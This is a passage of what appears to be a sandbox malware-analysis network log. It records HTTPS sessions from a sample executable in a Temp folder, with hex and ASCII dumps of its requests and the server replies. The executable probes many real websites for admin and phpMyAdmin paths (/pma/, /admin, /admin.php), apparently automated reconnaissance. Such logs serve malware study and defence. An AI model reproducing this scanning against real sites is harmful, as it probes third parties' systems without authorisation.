GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
2023-11-30 10:22:46 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	56672	104.238.144.219	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:46 UTC	163	OUT	GET /pma/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:46 UTC	221	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 36 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 37 20 28 63 65 6e 74 6f 73 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6b 20 6d 6f 64 5f 77 73 67 69 2f 34 2e 36 2e 34 20 50 79 74 68 6f 6e 2f 33 2e 36 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:46 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
2023-11-30 10:22:46 UTC	196	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	56665	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:46 UTC	160	OUT	GET /pma/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:46 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:46 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:46 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	56878	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:46 UTC	160	OUT	GET /pma/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:46 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:46 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:46 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	56791	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:46 UTC	161	OUT	GET /admin HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:46 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:46 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:46 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	57618	3.33.224.147	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:46 UTC	162	OUT	GET /admin/ HTTP/1.1 Host: hna.be Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:46 UTC	370	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 36 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 68 6e 61 2e 62 65 0d 0a 58 2d 52 61 74 65 4c 69 6d 69 74 2d 4c 69 6d 69 74 3a 20 31 32 30 30 0d 0a 58 2d 52 61 74 65 4c 69 6d 69 74 Data Ascii: HTTP/1.1 302 FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, privateDate: Thu, 30 Nov 2023 10:22:46 GMTLocation: https://hna.beX-RateLimit-Limit: 1200X-RateLimit
2023-11-30 10:22:46 UTC	314	IN	Data Raw: 31 32 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 68 6e 61 2e 62 65 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 68 6e 61 2e 62 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 Data Ascii: 12e<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://hna.be'" /> <title>Redirecting to https://hna.be</title> </head> <body> Redirecting to <a href="htt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	57371	194.63.248.47	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:46 UTC	161	OUT	GET /pma/ HTTP/1.1 Host: z-a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:47 UTC	180	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 36 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:46 GMTServer: Apache/2.4.25 (Debian)Content-Length: 270Connection: closeContent-Type: text/html; charset=iso-8859-1
2023-11-30 10:22:47 UTC	270	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 7a 2d 61 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at z-a.com Port 443</address>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	57366	104.238.144.219	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:46 UTC	164	OUT	GET /admin HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:46 UTC	221	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 36 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 37 20 28 63 65 6e 74 6f 73 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6b 20 6d 6f 64 5f 77 73 67 69 2f 34 2e 36 2e 34 20 50 79 74 68 6f 6e 2f 33 2e 36 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:46 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
2023-11-30 10:22:46 UTC	196	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	57970	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:46 UTC	165	OUT	GET /admin.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:47 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:47 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:47 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	57984	194.63.248.47	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:46 UTC	166	OUT	GET /admin.php HTTP/1.1 Host: z-a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:47 UTC	180	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 37 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenDate: Thu, 30 Nov 2023 10:22:47 GMTServer: Apache/2.4.25 (Debian)Content-Length: 273Connection: closeContent-Type: text/html; charset=iso-8859-1
2023-11-30 10:22:47 UTC	273	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 7a 2d 61 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.25 (Debian) Server at z-a.com Port 443</addres

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.4	58292	15.197.172.60	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:46 UTC	277	OUT	GET /admin HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.119.144.89; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:47 UTC	765	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:47 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
